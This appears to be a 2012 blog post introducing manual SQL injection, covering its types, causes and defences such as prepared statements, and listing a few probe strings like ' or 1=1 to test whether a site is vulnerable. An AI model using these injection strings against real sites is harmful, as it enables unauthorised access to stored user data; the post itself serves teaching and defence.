Dumping database using sql injection

Posted: November 7, 2012 in Application Security

I have given an overview of SQL INJECTION (SQLI) in my previous post. As I mentioned you that the SQLI can be done in two ways

  •  MANUALLY.
  •  AUTOMATION.

Here we are going to discuss the Manual method of injection.

Manual SQL Injection is done by Manually pen-testing the application where the pen-tester or the attacker exploits the SQLI by injecting the malicious/vulnerable string into the application directly by interacting with it and digs juicy information from the application like usernames, passwords, SSN, etc… without using any tool.

Things Required for doing manual Injection is:

  •  SQLI vulnerable site
  •  Burp Suite(to observe request and responses)
  • Patience
  •  Bit knowledge in SQL or the database that the application uses.
  •  And Brain :D

(we can use cheat-sheet present in Pentest Monkey for database help)

Learning Objectives:

After going through this post you will be able to

  •  Various types of SQL Injection attacks
  •  Causes for SQLI
  •  Design strategies for avoid SQLI
  •  Exploiting the SQLI

Types:

In-general they are broadly categorised into three

1) In-band
2) Out-of-band
3) Blind SQLI

In-band: Also know as Error-Based SQLI. Here the application responds with an error. Uses single channel for communication. It is straight forward method.

Out-of-band: Communication happens using two way channel. Attacker enters data directly but the application responds by sending e-mails etc….

Blind SQL Injection: Here the applications doesn’t pops any error. Instead the attacker need to extract the data by giving true/false questions and observing the responses of the application.

Causes for SQL Injection:

There might be many causes for any kind of vulnerability in the application. They might be because of

  • Improper coding
  • Developer might not be aware of the vulnerabilities
  • Improper validation
  • Improper filtering or escaping of the special characters
  • Directly inserting the values got from the web-form into the SQL query.

Avoiding SQLI:

  •  Using prepared statements is the best solution for avoiding SQLI as the interpreter doesn’t come into the picture each and every time the query is framed.
  •  Doing proper validation
  •  Escaping the suspicious strings or characters
  •  Using Filters or white lists (Allowing only required characters)

Exploiting the Vulnerability:

In-order the exploit the vulnerability, first we need to confirm that the application is vulnerable to SQL Injection. We can test it in many ways by inserting various logical strings to the application like ‘, ‘or’=’, ‘ or 1=1, ‘ or ‘a’=’a’ etc….

I have written an article for exploiting and extracting complete data from the database using all the three types (In-band, Out-of-band, Blind). You can find the article here: Dumping database using SQL Injection.

Also have a look at Web application Security Course offered by InfosecInstitute.

About these ads

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s